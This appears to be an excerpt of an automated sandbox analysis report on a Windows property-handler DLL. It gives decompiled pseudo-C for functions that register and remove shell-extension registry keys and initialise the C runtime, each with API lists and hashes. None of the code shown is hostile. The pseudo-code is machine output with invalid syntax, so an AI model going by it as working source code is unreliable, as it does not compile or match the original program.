                                              				int _t26;
                                              				wchar_t* _t32;
                                              				intOrPtr _t33;
                                              				intOrPtr _t37;
                                              				void* _t40;
                                              				WCHAR* _t41;
                                              				short _t42;
                                              				signed int _t44;
                                              				void* _t48;
                                              				short _t52;
                                              
                                              				_t20 =  *0x10012158; // 0x3c5a3040
                                              				_v8 = _t20 ^ _t44;
                                              				_t37 = _a8;
                                              				_v1036 = _a4;
                                              				_t6 =  &_a12; // 0x3c5a3040
                                              				_t41 =  *_t6;
                                              				_v1040 = _a16;
                                              				_t42 = 0;
                                              				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
                                              				if(_t26 < 0) {
                                              					L4:
                                              					_t42 = 0x8007007a;
                                              					goto L5;
                                              				} else {
                                              					_t48 = _t26 - 0x1ff;
                                              					if(_t48 > 0) {
                                              						goto L4;
                                              					} else {
                                              						if(_t48 == 0) {
                                              							L5:
                                              							_v10 = 0;
                                              						}
                                              					}
                                              				}
                                              				if(_t42 >= 0) {
                                              					_t32 =  &_v1032;
                                              					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
                                              					_t42 = _t32;
                                              					if(_t42 > 0) {
                                              						_t52 = _t42;
                                              					}
                                              					if(_t52 >= 0) {
                                              						_t33 = _v1036;
                                              						if( *((char*)(_t33 + 0x26a)) == 0) {
                                              							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
                                              							if(_t33 == 0) {
                                              								L14:
                                              								 *((char*)(_v1036 + 0x26a)) = 1;
                                              							} else {
                                              								_t37 = StrStrIW;
                                              								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
                                              									goto L14;
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
                                              			}

                                              APIs
                                              • vswprintf.LIBCMT ref: 10003441
                                                • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                              • lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
                                              • RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
                                              • StrCmpNICW.SHLWAPI(@0Z<,Software\Classes\%s,00000013), ref: 100034BA
                                              • StrStrIW.SHLWAPI(@0Z<,PropertyHandlers), ref: 100034D0
                                              • StrStrIW.SHLWAPI(@0Z<,KindMap), ref: 100034DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Value__vsnwprintf_llstrlenvswprintf
                                              • String ID: @0Z<$KindMap$PropertyHandlers$Software\Classes\%s
                                              • API String ID: 1581644826-1279041905
                                              • Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                              • Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
                                              • Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                              • Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 49%
                                              			E10003510(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, void _a24) {
                                              				signed int _v8;
                                              				short _v10;
                                              				long _v1032;
                                              				intOrPtr _v1036;
                                              				intOrPtr _v1040;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t19;
                                              				int _t25;
                                              				wchar_t* _t30;
                                              				intOrPtr _t31;
                                              				intOrPtr _t35;
                                              				void* _t38;
                                              				WCHAR* _t39;
                                              				short _t40;
                                              				signed int _t42;
                                              				void* _t46;
                                              				short _t50;
                                              
                                              				_t19 =  *0x10012158; // 0x3c5a3040
                                              				_v8 = _t19 ^ _t42;
                                              				_t35 = _a8;
                                              				_v1036 = _a4;
                                              				_t6 =  &_a12; // 0x3c5a3040
                                              				_t39 =  *_t6;
                                              				_v1040 = _a16;
                                              				_t40 = 0;
                                              				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
                                              				if(_t25 < 0) {
                                              					L4:
                                              					_t40 = 0x8007007a;
                                              					goto L5;
                                              				} else {
                                              					_t46 = _t25 - 0x1ff;
                                              					if(_t46 > 0) {
                                              						goto L4;
                                              					} else {
                                              						if(_t46 == 0) {
                                              							L5:
                                              							_v10 = 0;
                                              						}
                                              					}
                                              				}
                                              				if(_t40 >= 0) {
                                              					_t30 =  &_v1032;
                                              					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
                                              					_t40 = _t30;
                                              					if(_t40 > 0) {
                                              						_t50 = _t40;
                                              					}
                                              					if(_t50 >= 0) {
                                              						_t31 = _v1036;
                                              						if( *((char*)(_t31 + 0x26a)) == 0) {
                                              							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
                                              							if(_t31 == 0) {
                                              								L14:
                                              								 *((char*)(_v1036 + 0x26a)) = 1;
                                              							} else {
                                              								_t35 = StrStrIW;
                                              								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
                                              									goto L14;
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
                                              			}

                                              APIs
                                              • vswprintf.LIBCMT ref: 10003551
                                                • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                              • RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
                                              • StrCmpNICW.SHLWAPI(@0Z<,Software\Classes\%s,00000013), ref: 100035BD
                                              • StrStrIW.SHLWAPI(@0Z<,PropertyHandlers), ref: 100035D3
                                              • StrStrIW.SHLWAPI(@0Z<,KindMap), ref: 100035DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Value__vsnwprintf_lvswprintf
                                              • String ID: @0Z<$KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
                                              • API String ID: 396321892-3656019630
                                              • Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                              • Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
                                              • Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                              • Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int* _t81;
                                              				void* _t86;
                                              				long _t90;
                                              				intOrPtr _t94;
                                              				signed int _t98;
                                              				signed int _t99;
                                              				signed char _t103;
                                              				intOrPtr* _t105;
                                              				intOrPtr _t106;
                                              				intOrPtr* _t109;
                                              				signed char _t111;
                                              				long _t119;
                                              				signed int _t130;
                                              				signed int* _t134;
                                              				intOrPtr _t135;
                                              				signed int* _t138;
                                              				void** _t139;
                                              				intOrPtr _t141;
                                              				void* _t142;
                                              				signed int _t143;
                                              				void** _t147;
                                              				signed int _t149;
                                              				void* _t150;
                                              				void** _t154;
                                              				void* _t155;
                                              
                                              				_push(0x64);
                                              				_push(0x10010d68);
                                              				E10008040(__ebx, __edi, __esi);
                                              				E100091AB(0xb);
                                              				_t130 = 0;
                                              				 *(_t155 - 4) = 0;
                                              				if( *0x10014c80 == 0) {
                                              					_push(0x40);
                                              					_t141 = 0x20;
                                              					_push(_t141);
                                              					_t81 = E10007F1D();
                                              					_t134 = _t81;
                                              					 *(_t155 - 0x24) = _t134;
                                              					if(_t134 != 0) {
                                              						 *0x10014c80 = _t81;
                                              						 *0x10014c64 = _t141;
                                              						while(_t134 <  &(_t81[0x200])) {
                                              							_t134[1] = 0xa00;
                                              							 *_t134 =  *_t134 | 0xffffffff;
                                              							_t134[2] = _t130;
                                              							_t134[9] = _t134[9] & 0x00000080;
                                              							_t134[9] = _t134[9] & 0x0000007f;
                                              							_t134[9] = 0xa0a;
                                              							_t134[0xe] = _t130;
                                              							_t134[0xd] = _t130;
                                              							_t134 =  &(_t134[0x10]);
                                              							 *(_t155 - 0x24) = _t134;
                                              							_t81 =  *0x10014c80;
                                              						}
                                              						GetStartupInfoW(_t155 - 0x74);
                                              						if( *((short*)(_t155 - 0x42)) == 0) {
                                              							while(1) {
                                              								L31:
                                              								 *(_t155 - 0x2c) = _t130;
                                              								if(_t130 >= 3) {
                                              									break;
                                              								}
                                              								_t147 =  *0x10014c80 + (_t130 << 6);
                                              								 *(_t155 - 0x24) = _t147;
                                              								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
                                              									_t147[1] = 0x81;
                                              									if(_t130 != 0) {
                                              										_t66 = _t130 - 1; // -1
                                              										asm("sbb eax, eax");
                                              										_t90 =  ~_t66 + 0xfffffff5;
                                              									} else {
                                              										_t90 = 0xfffffff6;
                                              									}
                                              									_t142 = GetStdHandle(_t90);
                                              									if(_t142 == 0xffffffff || _t142 == 0) {
                                              										L47:
                                              										_t147[1] = _t147[1] | 0x00000040;
                                              										 *_t147 = 0xfffffffe;
                                              										_t94 =  *0x10013c48; // 0x0
                                              										if(_t94 != 0) {
                                              											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                              										}
                                              										goto L49;
                                              									} else {
                                              										_t98 = GetFileType(_t142);
                                              										if(_t98 == 0) {
                                              											goto L47;
                                              										}
                                              										 *_t147 = _t142;
                                              										_t99 = _t98 & 0x000000ff;
                                              										if(_t99 != 2) {
                                              											if(_t99 != 3) {
                                              												L46:
                                              												_t70 =  &(_t147[3]); // -268520564
                                              												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                              												_t147[2] = _t147[2] + 1;
                                              												goto L49;
                                              											}
                                              											_t103 = _t147[1] | 0x00000008;
                                              											L45:
                                              											_t147[1] = _t103;
                                              											goto L46;
                                              										}
                                              										_t103 = _t147[1] | 0x00000040;
                                              										goto L45;
                                              									}
                                              								} else {
                                              									_t147[1] = _t147[1] | 0x00000080;
                                              									L49:
                                              									_t130 = _t130 + 1;
                                              									continue;
                                              								}
                                              							}
                                              							 *(_t155 - 4) = 0xfffffffe;
                                              							E100079DD();
                                              							L2:
                                              							_t86 = 1;
                                              							L3:
                                              							return E10008085(_t86);
                                              						}
                                              						_t105 =  *((intOrPtr*)(_t155 - 0x40));
                                              						if(_t105 == 0) {
                                              							goto L31;
                                              						}
                                              						_t135 =  *_t105;
                                              						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                              						_t106 = _t105 + 4;
                                              						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                              						 *(_t155 - 0x20) = _t106 + _t135;
                                              						if(_t135 >= 0x800) {
                                              							_t135 = 0x800;
                                              							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
                                              						}
                                              						_t149 = 1;
                                              						 *(_t155 - 0x30) = 1;
                                              						while( *0x10014c64 < _t135) {
                                              							_t138 = E10007F1D(_t141, 0x40);
                                              							 *(_t155 - 0x24) = _t138;
                                              							if(_t138 != 0) {
                                              								0x10014c80[_t149] = _t138;
                                              								 *0x10014c64 =  *0x10014c64 + _t141;
                                              								while(_t138 <  &(0x10014c80[_t149][0x200])) {
                                              									_t138[1] = 0xa00;
                                              									 *_t138 =  *_t138 | 0xffffffff;
                                              									_t138[2] = _t130;
                                              									_t138[9] = _t138[9] & 0x00000080;
                                              									_t138[9] = 0xa0a;
                                              									_t138[0xe] = _t130;
                                              									_t138[0xd] = _t130;
                                              									_t138 =  &(_t138[0x10]);
                                              									 *(_t155 - 0x24) = _t138;
                                              								}
                                              								_t149 = _t149 + 1;
                                              								 *(_t155 - 0x30) = _t149;
                                              								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                              								continue;
                                              							}
                                              							_t135 =  *0x10014c64;
                                              							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                              							break;
                                              						}
                                              						_t143 = _t130;
                                              						 *(_t155 - 0x2c) = _t143;
                                              						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                              						_t139 =  *(_t155 - 0x20);
                                              						while(_t143 < _t135) {
                                              							_t150 =  *_t139;
                                              							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
                                              								L26:
                                              								_t143 = _t143 + 1;
                                              								 *(_t155 - 0x2c) = _t143;
                                              								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                              								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                              								_t139 =  &(_t139[1]);
                                              								 *(_t155 - 0x20) = _t139;
                                              								continue;
                                              							} else {
                                              								_t111 =  *_t109;
                                              								if((_t111 & 0x00000001) == 0) {
                                              									goto L26;
                                              								}
                                              								if((_t111 & 0x00000008) != 0) {
                                              									L24:
                                              									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                              									 *(_t155 - 0x24) = _t154;
                                              									 *_t154 =  *_t139;
                                              									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                              									_t38 =  &(_t154[3]); // 0xd
                                              									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                              									_t154[2] = _t154[2] + 1;
                                              									_t139 =  *(_t155 - 0x20);
                                              									L25:
                                              									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                              									goto L26;
                                              								}
                                              								_t119 = GetFileType(_t150);
                                              								_t139 =  *(_t155 - 0x20);
                                              								if(_t119 == 0) {
                                              									goto L25;
                                              								}
                                              								goto L24;
                                              							}
                                              						}
                                              						goto L31;
                                              					}
                                              					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
                                              					_t86 = 0;
                                              					goto L3;
                                              				}
                                              				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
                                              				goto L2;
                                              			}


                                              APIs
                                              • __lock.LIBCMT ref: 10007727
                                                • Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
                                                • Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
                                                • Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
                                              • __calloc_crt.LIBCMT ref: 1000775E
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
                                              • GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
                                              • __calloc_crt.LIBCMT ref: 10007819
                                              • GetFileType.KERNEL32 ref: 10007860
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
                                              • GetStdHandle.KERNEL32(-000000F6), ref: 10007952
                                              • GetFileType.KERNEL32 ref: 10007964
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 301580142-0
                                              • Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                              • Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
                                              • Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
                                              • Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 49%
                                              			E10003310(char _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
                                              				signed int _v8;
                                              				short _v10;
                                              				long _v1032;
                                              				intOrPtr _v1036;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t16;
                                              				int _t21;
                                              				void* _t24;
                                              				intOrPtr _t26;
                                              				signed short _t30;
                                              				void* _t31;
                                              				void* _t34;
                                              				intOrPtr _t35;
                                              				WCHAR* _t36;
                                              				signed short _t37;
                                              				signed int _t40;
                                              				void* _t44;
                                              
                                              				_t16 =  *0x10012158; // 0x3c5a3040
                                              				_v8 = _t16 ^ _t40;
                                              				_t2 =  &_a4; // 0x3c5a3040
                                              				_t35 = _a8;
                                              				_v1036 =  *_t2;
                                              				_t37 = 0;
                                              				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
                                              				if(_t21 < 0) {
                                              					L4:
                                              					_t37 = 0x8007007a;
                                              					L5:
                                              					_v10 = 0;
                                              					L6:
                                              					if(_t37 >= 0) {
                                              						_t30 =  &_v1032;
                                              						__imp__RegDeleteTreeW(_t35, _t30);
                                              						_t37 = _t30;
                                              						if(_t37 > 0) {
                                              							_t37 = _t37 & 0x0000ffff | 0x80070000;
                                              						}
                                              					}
                                              					_t36 = _a12;
                                              					if(_t37 >= 0) {
                                              						_t26 = _v1036;
                                              						if( *((char*)(_t26 + 0x26a)) == 0) {
                                              							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
                                              							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
                                              								 *((char*)(_v1036 + 0x26a)) = 1;
                                              							}
                                              						}
                                              					}
                                              					_t38 =  ==  ? 0 : _t37;
                                              					_t24 =  ==  ? 0 : _t37;
                                              					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
                                              				}
                                              				_t44 = _t21 - 0x1ff;
                                              				if(_t44 > 0) {
                                              					goto L4;
                                              				}
                                              				if(_t44 != 0) {
                                              					goto L6;
                                              				} else {
                                              					goto L5;
                                              				}
                                              			}






















                                              APIs
                                              • vswprintf.LIBCMT ref: 10003346
                                                • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                              • RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
                                              • StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
                                              • StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
                                              • StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: DeleteTree__vsnwprintf_lvswprintf
                                              • String ID: @0Z<$KindMap$PropertyHandlers$Software\Classes\%s
                                              • API String ID: 1945471109-1279041905
                                              • Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                              • Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
                                              • Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                              • Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E1000CB53(void* __eflags, signed int _a4) {
                                              				void* _t12;
                                              				signed int _t13;
                                              				signed int _t16;
                                              				intOrPtr _t18;
                                              				void* _t22;
                                              				signed int _t35;
                                              				long _t40;
                                              
                                              				_t13 = E100076DE(_t12);
                                              				if(_t13 >= 0) {
                                              					_t35 = _a4;
                                              					if(E1000C21F(_t35) == 0xffffffff) {
                                              						L10:
                                              						_t40 = 0;
                                              					} else {
                                              						_t18 =  *0x10014c80;
                                              						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                              							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                              								goto L8;
                                              							} else {
                                              								goto L7;
                                              							}
                                              						} else {
                                              							L7:
                                              							_t22 = E1000C21F(2);
                                              							if(E1000C21F(1) == _t22) {
                                              								goto L10;
                                              							} else {
                                              								L8:
                                              								if(CloseHandle(E1000C21F(_t35)) != 0) {
                                              									goto L10;
                                              								} else {
                                              									_t40 = GetLastError();
                                              								}
                                              							}
                                              						}
                                              					}
                                              					E1000C199(_t35);
                                              					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                              					if(_t40 == 0) {
                                              						_t16 = 0;
                                              					} else {
                                              						_t16 = E10005EA5(_t40) | 0xffffffff;
                                              					}
                                              					return _t16;
                                              				} else {
                                              					return _t13 | 0xffffffff;
                                              				}
                                              			}











                                              APIs
                                              • __ioinit.LIBCMT ref: 1000CB56
                                                • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                              • __get_osfhandle.LIBCMT ref: 1000CB6A
                                              • __get_osfhandle.LIBCMT ref: 1000CB95
                                              • __get_osfhandle.LIBCMT ref: 1000CB9E
                                              • __get_osfhandle.LIBCMT ref: 1000CBAA
                                              • CloseHandle.KERNEL32(00000000), ref: 1000CBB1
                                              • GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
                                              • __free_osfhnd.LIBCMT ref: 1000CBC8
                                              • __dosmaperr.LIBCMT ref: 1000CBEA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                              • String ID:
                                              • API String ID: 974577687-0
                                              • Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                              • Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
                                              • Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                              • Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
                                              • VariantClear.OLEAUT32(?), ref: 10002B69
                                                • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                                • Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
                                                • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                                • Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                                • Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                              • PropVariantClear.OLE32(?), ref: 10002B59
                                              • VariantClear.OLEAUT32(?), ref: 10002B63
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
                                              • String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
                                              • API String ID: 3673094071-3396277477
                                              • Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                              • Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
                                              • Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                              • Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E100061BA(void* __ebx, void* __edi) {
                                              				void* __esi;
                                              				void* _t3;
                                              				intOrPtr _t6;
                                              				long _t14;
                                              				long* _t27;
                                              
                                              				E1000750E(_t3);
                                              				if(E100092DA() != 0) {
                                              					_t6 = E10007E6B(_t5, E10005F1A);
                                              					 *0x10012310 = _t6;
                                              					__eflags = _t6 - 0xffffffff;
                                              					if(_t6 == 0xffffffff) {
                                              						goto L1;
                                              					} else {
                                              						_t27 = E10007F1D(1, 0x3b8);
                                              						__eflags = _t27;
                                              						if(_t27 == 0) {
                                              							L6:
                                              							E10006230();
                                              							__eflags = 0;
                                              							return 0;
                                              						} else {
                                              							__eflags = E10007E95(_t9,  *0x10012310, _t27);
                                              							if(__eflags == 0) {
                                              								goto L6;
                                              							} else {
                                              								_push(0);
                                              								_push(_t27);
                                              								E1000610E(__ebx, __edi, _t27, __eflags);
                                              								_t14 = GetCurrentThreadId();
                                              								_t27[1] = _t27[1] | 0xffffffff;
                                              								 *_t27 = _t14;
                                              								__eflags = 1;
                                              								return 1;
                                              							}
                                              						}
                                              					}
                                              				} else {
                                              					L1:
                                              					E10006230();
                                              					return 0;
                                              				}
                                              			}









                                              APIs
                                              • __init_pointers.LIBCMT ref: 100061BA
                                                • Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
                                                • Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532
                                              • __mtinitlocks.LIBCMT ref: 100061BF
                                                • Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8
                                              • __mtterm.LIBCMT ref: 100061C8
                                                • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
                                                • Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
                                                • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F
                                              • __calloc_crt.LIBCMT ref: 100061ED
                                              • __initptd.LIBCMT ref: 1000620F
                                              • GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
